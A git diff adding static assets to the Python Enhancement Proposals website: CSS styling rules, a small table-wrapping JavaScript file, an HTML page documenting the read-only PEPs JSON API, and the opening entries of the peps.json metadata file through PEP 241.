{display: initial} +:root[data-colour_scheme="light"] #colour-scheme-cycler svg.colour-scheme-icon-when-light {display: initial} + +/* Admonitions rules */ +div.admonition { + background-color: var(--colour-background-accent-medium); + margin-bottom: 1rem; + margin-top: 1rem; + padding: 0.5rem 0.75rem; +} +div.admonition a { + color: var(--colour-links-light); +} + +div.danger, +div.error { + background-color: var(--colour-error); +} +div.warning { + background-color: var(--colour-warning); +} +div.attention, +div.caution { + background-color: var(--colour-caution); +} +div.important { + background-color: var(--colour-attention); +} +div.hint, +div.tip { + background-color: var(--colour-tip); +} + +p.admonition-title { + font-weight: bold; +} + +/* PEP Header / references rules */ +dl.rfc2822, +dl.footnote { + display: grid; + grid-template-columns: 
fit-content(30%) auto; + width: 100%; +} +dl.footnote { + border-top: 1px solid var(--colour-rule-strong); + line-height: 1.875; +} +dl.rfc2822 > dt, +dl.rfc2822 > dd { + padding: .1rem .3rem .1rem; +} +dl.footnote > dt, +dl.footnote > dd { + padding: .25rem .5rem .2rem; + border-bottom: 1px solid var(--colour-rule-strong); +} +dl.rfc2822 > dt { + text-align: right; +} +dl.footnote > dt { + font-weight: normal; + border-right: 1px solid var(--colour-background); +} +dl.rfc2822 > dd, +dl.footnote > dd { + margin: 0; +} + +/* Sidebar formatting */ +#pep-sidebar { + overflow-y: auto; + position: sticky; + top: 0; + height: 100vh; +} +#pep-sidebar > h2 { + font-size: 1.4rem; +} +#contents ol, +#contents ul, +#pep-sidebar ol, +#pep-sidebar ul { + padding: 0; + margin: 0 0 0 1.5rem; +} +#pep-sidebar ul { + font-size: .9rem; + margin-left: 1rem; +} +#pep-sidebar ul a { + text-decoration: none; +} +#source { + padding-bottom: 2rem; + font-weight: bold; +} + +.reference.external > strong { + font-weight: normal; /* Fix strong links for :pep: and :rfc: roles */ +} + +.visually-hidden { + position: absolute !important; + width: 1px !important; + height: 1px !important; + padding: 0 !important; + margin: -1px !important; + overflow: hidden !important; + clip-path: polygon(0px 0px, 0px 0px,0px 0px, 0px 0px) !important; + white-space: nowrap !important; + border: 0 !important; +} + +/* Sticky banners */ +/* Default styles, sticky for larger screens */ +.sticky-banner { + top: 0; + position: sticky; + z-index: 1; +} + +/* Override for smaller screens, non-sticky */ +@media (max-width: 600px) { + .sticky-banner { + position: static; + padding: 5px; + font-size: 12px; + } +} + +.close-button { + cursor: pointer; + position: absolute; + top: 0; + right: 0; + padding: 0.5em; + font-size: 1.5em; + border: none; + background: transparent; + color: inherit; + margin-top: 0; +} diff --git a/_static/wrap_tables.js b/_static/wrap_tables.js new file mode 100644 index 00000000000..70c0a3a4bc0 --- /dev/null +++ b/_static/wrap_tables.js @@ -0,0 +1,30 @@ +// Wrap the tables in PEP bodies in a div, to allow for responsive scrolling + +"use strict"; + +const pepContentId = "pep-content"; + + +// Wrap passed table element in wrapper divs +function wrapTable (table) { + const wrapper = document.createElement("div"); + wrapper.classList.add("table-wrapper"); + table.parentNode.insertBefore(wrapper, table); + wrapper.appendChild(table); +} + + +// Wrap all tables in the PEP content in wrapper divs +function wrapPepContentTables () { + const pepContent = document.getElementById(pepContentId); + const bodyTables = pepContent.getElementsByTagName("table"); + Array.from(bodyTables).forEach(wrapTable); +} + + +// Wrap the tables as soon as the DOM is loaded +document.addEventListener("DOMContentLoaded", () => { + if (document.getElementById(pepContentId)) { + wrapPepContentTables(); + } +}) diff --git a/api/index.html b/api/index.html new file mode 100644 index 00000000000..5be039aa279 --- /dev/null +++ b/api/index.html @@ -0,0 +1,183 @@ + + + + + + + + PEPs API | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
Python Enhancement Proposals

PEPs API

There is a read-only API of published PEPs available at:

+ +

The structure is like:

+
{
+  "<PEP number>": {
+    "number": integer,
+    "title": string,
+    "authors": string,
+    "discussions_to": string | null,
+    "status": "Accepted" | "Active" | "Deferred" | "Draft" | "Final" | "Provisional" | "Rejected" | "Superseded" | "Withdrawn",
+    "type": "Informational" | "Process" | "Standards Track",
+    "topic": "governance" | "packaging" | "release" | "typing" | "",
+    "created": string,
+    "python_version": string | null,
+    "post_history": string,
+    "resolution": string | null,
+    "requires": string | null,
+    "replaces": string | null,
+    "superseded_by": string | null,
+    "url": string
+  },
+}
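For Python consumers, the schema above maps naturally onto a typed dictionary. This is an unofficial sketch — the name PEPEntry is mine — and note that although the schema lists post_history as a plain string, some published entries carry null there (e.g. PEP 3 in the full data below):

    from typing import TypedDict

    class PEPEntry(TypedDict):
        """One value in peps.json; unofficial mirror of the schema above."""
        number: int
        title: str
        authors: str
        discussions_to: str | None
        status: str   # "Accepted" | "Active" | "Deferred" | "Draft" | "Final" | "Provisional" | "Rejected" | "Superseded" | "Withdrawn"
        type: str     # "Informational" | "Process" | "Standards Track"
        topic: str    # "governance" | "packaging" | "release" | "typing" | ""
        created: str
        python_version: str | None
        post_history: str | None  # schema says string; null occurs in practice
        resolution: str | None
        requires: str | None
        replaces: str | None
        superseded_by: str | None
        url: str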
Date values are formatted as DD-MMM-YYYY, and multiple dates are combined in a comma-separated list.

For example:
{
+  "8": {
+    "number": 8,
+    "title": "Style Guide for Python Code",
+    "authors": "Guido van Rossum, Barry Warsaw, Alyssa Coghlan",
+    "discussions_to": null,
+    "status": "Active",
+    "type": "Process",
+    "topic": "",
+    "created": "05-Jul-2001",
+    "python_version": null,
+    "post_history": "05-Jul-2001, 01-Aug-2013",
+    "resolution": null,
+    "requires": null,
+    "replaces": null,
+    "superseded_by": null,
+    "url": "https://peps.python.org/pep-0008/"
+  },
+  "484": {
+    "number": 484,
+    "title": "Type Hints",
+    "authors": "Guido van Rossum, Jukka Lehtosalo, Łukasz Langa",
+    "discussions_to": "python-dev@python.org",
+    "status": "Final",
+    "type": "Standards Track",
+    "topic": "typing",
+    "created": "29-Sep-2014",
+    "python_version": "3.5",
+    "post_history": "16-Jan-2015, 20-Mar-2015, 17-Apr-2015, 20-May-2015, 22-May-2015",
+    "resolution": "https://mail.python.org/pipermail/python-dev/2015-May/140104.html",
+    "requires": null,
+    "replaces": null,
+    "superseded_by": null,
+    "url": "https://peps.python.org/pep-0484/"
+  },
+  "622": {
+    "number": 622,
+    "title": "Structural Pattern Matching",
+    "authors": "Brandt Bucher, Daniel F Moisset, Tobias Kohn, Ivan Levkivskyi, Guido van Rossum, Talin",
+    "discussions_to": "python-dev@python.org",
+    "status": "Superseded",
+    "type": "Standards Track",
+    "topic": "",
+    "created": "23-Jun-2020",
+    "python_version": "3.10",
+    "post_history": "23-Jun-2020, 08-Jul-2020",
+    "resolution": null,
+    "requires": null,
+    "replaces": null,
+    "superseded_by": "634",
+    "url": "https://peps.python.org/pep-0622/"
+  }
+}
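As a usage sketch, the index can be fetched and queried with nothing beyond the standard library. The endpoint URL is the one given above; the variable names and the particular queries are illustrative only:

    import json
    import urllib.request
    from datetime import datetime

    API_URL = "https://peps.python.org/api/peps.json"

    with urllib.request.urlopen(API_URL) as response:
        peps = json.load(response)

    # Example query: titles of all Active Process PEPs.
    active_process = [
        pep["title"]
        for pep in peps.values()
        if pep["status"] == "Active" and pep["type"] == "Process"
    ]

    # Dates use the DD-MMM-YYYY format noted above, with multiple dates
    # comma-separated. (A few post_history values embed links rather than
    # plain dates, so production code should guard against parse errors.)
    post_dates = [
        datetime.strptime(date.strip(), "%d-%b-%Y").date()
        for date in peps["8"]["post_history"].split(",")
    ]
    print(len(active_process), post_dates)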
+ + + + + \ No newline at end of file diff --git a/api/peps.json b/api/peps.json new file mode 100644 index 00000000000..c7ca20cfcf1 --- /dev/null +++ b/api/peps.json @@ -0,0 +1,11375 @@ +{ + "1": { + "number": 1, + "title": "PEP Purpose and Guidelines", + "authors": "Barry Warsaw, Jeremy Hylton, David Goodger, Alyssa Coghlan", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "13-Jun-2000", + "python_version": null, + "post_history": "21-Mar-2001, 29-Jul-2002, 03-May-2003, 05-May-2012, 07-Apr-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0001/" + }, + "2": { + "number": 2, + "title": "Procedure for Adding New Modules", + "authors": "Brett Cannon, Martijn Faassen", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "07-Jul-2001", + "python_version": null, + "post_history": "07-Jul-2001, 09-Mar-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0002/" + }, + "3": { + "number": 3, + "title": "Guidelines for Handling Bug Reports", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "25-Sep-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0003/" + }, + "4": { + "number": 4, + "title": "Deprecation of Standard Modules", + "authors": "Brett Cannon, Martin von L\u00f6wis", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "01-Oct-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0004/" + }, + "5": { + "number": 5, + "title": "Guidelines for Language Evolution", + "authors": "Paul Prescod", + "discussions_to": null, + "status": "Superseded", + "type": "Process", + "topic": "", + "created": "26-Oct-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "387", + "url": "https://peps.python.org/pep-0005/" + }, + "6": { + "number": 6, + "title": "Bug Fix Releases", + "authors": "Aahz, Anthony Baxter", + "discussions_to": null, + "status": "Superseded", + "type": "Process", + "topic": "", + "created": "15-Mar-2001", + "python_version": null, + "post_history": "15-Mar-2001, 18-Apr-2001, 19-Aug-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0006/" + }, + "7": { + "number": 7, + "title": "Style Guide for C Code", + "authors": "Guido van Rossum, Barry Warsaw", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "05-Jul-2001", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0007/" + }, + "8": { + "number": 8, + "title": "Style Guide for Python Code", + "authors": "Guido van Rossum, Barry Warsaw, Alyssa Coghlan", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "05-Jul-2001", + "python_version": null, + "post_history": "05-Jul-2001, 01-Aug-2013", + "resolution": null, + "requires": null, + 
"replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0008/" + }, + "9": { + "number": 9, + "title": "Sample Plaintext PEP Template", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "14-Aug-2001", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/2YMHVPRDWGQLA5A2FKXE2JMLM2HQEEGW/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0009/" + }, + "10": { + "number": 10, + "title": "Voting Guidelines", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "07-Mar-2002", + "python_version": null, + "post_history": "07-Mar-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0010/" + }, + "11": { + "number": 11, + "title": "CPython platform support", + "authors": "Martin von L\u00f6wis, Brett Cannon", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "07-Jul-2002", + "python_version": null, + "post_history": "`18-Aug-2007 `__, `14-May-2014 `__, `20-Feb-2015 `__, `10-Mar-2022 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0011/" + }, + "12": { + "number": 12, + "title": "Sample reStructuredText PEP Template", + "authors": "David Goodger, Barry Warsaw, Brett Cannon", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "05-Aug-2002", + "python_version": null, + "post_history": "`30-Aug-2002 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0012/" + }, + "13": { + "number": 13, + "title": "Python Language Governance", + "authors": "The Python core team and community", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "governance", + "created": "16-Dec-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0013/" + }, + "20": { + "number": 20, + "title": "The Zen of Python", + "authors": "Tim Peters", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "19-Aug-2004", + "python_version": null, + "post_history": "22-Aug-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0020/" + }, + "42": { + "number": 42, + "title": "Feature Requests", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "12-Sep-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0042/" + }, + "100": { + "number": 100, + "title": "Python Unicode Integration", + "authors": "Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-Mar-2000", + "python_version": "2.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0100/" + }, + 
"101": { + "number": 101, + "title": "Doing Python Releases 101", + "authors": "Barry Warsaw, Guido van Rossum", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "22-Aug-2001", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": "102", + "superseded_by": null, + "url": "https://peps.python.org/pep-0101/" + }, + "102": { + "number": 102, + "title": "Doing Python Micro Releases", + "authors": "Anthony Baxter, Barry Warsaw, Guido van Rossum", + "discussions_to": null, + "status": "Superseded", + "type": "Informational", + "topic": "", + "created": "09-Jan-2002", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "101", + "url": "https://peps.python.org/pep-0102/" + }, + "103": { + "number": 103, + "title": "Collecting information about git", + "authors": "Oleg Broytman", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "01-Jun-2015", + "python_version": null, + "post_history": "12-Sep-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0103/" + }, + "160": { + "number": 160, + "title": "Python 1.6 Release Schedule", + "authors": "Fred L. Drake, Jr.", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "25-Jul-2000", + "python_version": "1.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0160/" + }, + "200": { + "number": 200, + "title": "Python 2.0 Release Schedule", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "12-Jul-2000", + "python_version": "2.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0200/" + }, + "201": { + "number": 201, + "title": "Lockstep Iteration", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Jul-2000", + "python_version": "2.0", + "post_history": "27-Jul-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0201/" + }, + "202": { + "number": 202, + "title": "List Comprehensions", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Jul-2000", + "python_version": "2.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0202/" + }, + "203": { + "number": 203, + "title": "Augmented Assignments", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Jul-2000", + "python_version": "2.0", + "post_history": "14-Aug-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0203/" + }, + "204": { + "number": 204, + "title": "Range Literals", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "14-Jul-2000", + 
"python_version": "2.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0204/" + }, + "205": { + "number": 205, + "title": "Weak References", + "authors": "Fred L. Drake, Jr.", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "14-Jul-2000", + "python_version": "2.1", + "post_history": "11-Jan-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0205/" + }, + "206": { + "number": 206, + "title": "Python Advanced Library", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "14-Jul-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0206/" + }, + "207": { + "number": 207, + "title": "Rich Comparisons", + "authors": "Guido van Rossum, David Ascher", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "25-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0207/" + }, + "208": { + "number": 208, + "title": "Reworking the Coercion Model", + "authors": "Neil Schemenauer, Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "04-Dec-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0208/" + }, + "209": { + "number": 209, + "title": "Multi-dimensional Arrays", + "authors": "Paul Barrett, Travis Oliphant", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "03-Jan-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0209/" + }, + "210": { + "number": 210, + "title": "Decoupling the Interpreter Loop", + "authors": "David Ascher", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "15-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0210/" + }, + "211": { + "number": 211, + "title": "Adding A New Outer Product Operator", + "authors": "Greg Wilson", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "15-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0211/" + }, + "212": { + "number": 212, + "title": "Loop Counter Iteration", + "authors": "Peter Schneider-Kamp", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "22-Aug-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0212/" + }, + "213": { + "number": 213, + "title": 
"Attribute Access Handlers", + "authors": "Paul Prescod", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "21-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0213/" + }, + "214": { + "number": 214, + "title": "Extended Print Statement", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "24-Jul-2000", + "python_version": "2.0", + "post_history": "16-Aug-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0214/" + }, + "215": { + "number": 215, + "title": "String Interpolation", + "authors": "Ka-Ping Yee", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "24-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "292", + "url": "https://peps.python.org/pep-0215/" + }, + "216": { + "number": 216, + "title": "Docstring Format", + "authors": "Moshe Zadka", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "31-Jul-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "287", + "url": "https://peps.python.org/pep-0216/" + }, + "217": { + "number": 217, + "title": "Display Hook for Interactive Use", + "authors": "Moshe Zadka", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "31-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0217/" + }, + "218": { + "number": 218, + "title": "Adding a Built-In Set Object Type", + "authors": "Greg Wilson, Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "31-Jul-2000", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0218/" + }, + "219": { + "number": 219, + "title": "Stackless Python", + "authors": "Gordon McMillan", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "14-Aug-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0219/" + }, + "220": { + "number": 220, + "title": "Coroutines, Generators, Continuations", + "authors": "Gordon McMillan", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "", + "created": "14-Aug-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0220/" + }, + "221": { + "number": 221, + "title": "Import As", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Aug-2000", + "python_version": "2.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, 
+ "superseded_by": null, + "url": "https://peps.python.org/pep-0221/" + }, + "222": { + "number": 222, + "title": "Web Library Enhancements", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "18-Aug-2000", + "python_version": "2.1", + "post_history": "22-Dec-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0222/" + }, + "223": { + "number": 223, + "title": "Change the Meaning of ``\\x`` Escapes", + "authors": "Tim Peters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Aug-2000", + "python_version": "2.0", + "post_history": "23-Aug-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0223/" + }, + "224": { + "number": 224, + "title": "Attribute Docstrings", + "authors": "Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "23-Aug-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0224/" + }, + "225": { + "number": 225, + "title": "Elementwise/Objectwise Operators", + "authors": "Huaiyu Zhu, Gregory Lielens", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "19-Sep-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0225/" + }, + "226": { + "number": 226, + "title": "Python 2.1 Release Schedule", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "16-Oct-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0226/" + }, + "227": { + "number": 227, + "title": "Statically Nested Scopes", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Nov-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0227/" + }, + "228": { + "number": 228, + "title": "Reworking Python's Numeric Model", + "authors": "Moshe Zadka, Guido van Rossum", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "04-Nov-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0228/" + }, + "229": { + "number": 229, + "title": "Using Distutils to Build Python", + "authors": "A.M. 
Kuchling", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Nov-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0229/" + }, + "230": { + "number": 230, + "title": "Warning Framework", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Nov-2000", + "python_version": "2.1", + "post_history": "05-Nov-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0230/" + }, + "231": { + "number": 231, + "title": "__findattr__()", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "30-Nov-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0231/" + }, + "232": { + "number": 232, + "title": "Function Attributes", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Dec-2000", + "python_version": "2.1", + "post_history": "20-Feb-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0232/" + }, + "233": { + "number": 233, + "title": "Python Online Help", + "authors": "Paul Prescod", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "11-Dec-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0233/" + }, + "234": { + "number": 234, + "title": "Iterators", + "authors": "Ka-Ping Yee, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jan-2001", + "python_version": "2.1", + "post_history": "30-Apr-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0234/" + }, + "235": { + "number": 235, + "title": "Import on Case-Insensitive Platforms", + "authors": "Tim Peters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "21-Feb-2001", + "python_version": "2.1", + "post_history": "16-Feb-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0235/" + }, + "236": { + "number": 236, + "title": "Back to the __future__", + "authors": "Tim Peters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Feb-2001", + "python_version": "2.1", + "post_history": "26-Feb-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0236/" + }, + "237": { + "number": 237, + "title": "Unifying Long Integers and Integers", + "authors": "Moshe Zadka, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2001", + "python_version": "2.2", + "post_history": "16-Mar-2001, 14-Aug-2001, 23-Aug-2001", + "resolution": null, + "requires": null, + 
"replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0237/" + }, + "238": { + "number": 238, + "title": "Changing the Division Operator", + "authors": "Moshe Zadka, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2001", + "python_version": "2.2", + "post_history": "16-Mar-2001, 26-Jul-2001, 27-Jul-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0238/" + }, + "239": { + "number": 239, + "title": "Adding a Rational Type to Python", + "authors": "Christopher A. Craig, Moshe Zadka", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2001", + "python_version": "2.2", + "post_history": "16-Mar-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0239/" + }, + "240": { + "number": 240, + "title": "Adding a Rational Literal to Python", + "authors": "Christopher A. Craig, Moshe Zadka", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2001", + "python_version": "2.2", + "post_history": "16-Mar-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0240/" + }, + "241": { + "number": 241, + "title": "Metadata for Python Software Packages", + "authors": "A.M. Kuchling", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Standards Track", + "topic": "packaging", + "created": "12-Mar-2001", + "python_version": null, + "post_history": "`19-Mar-2001 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "314", + 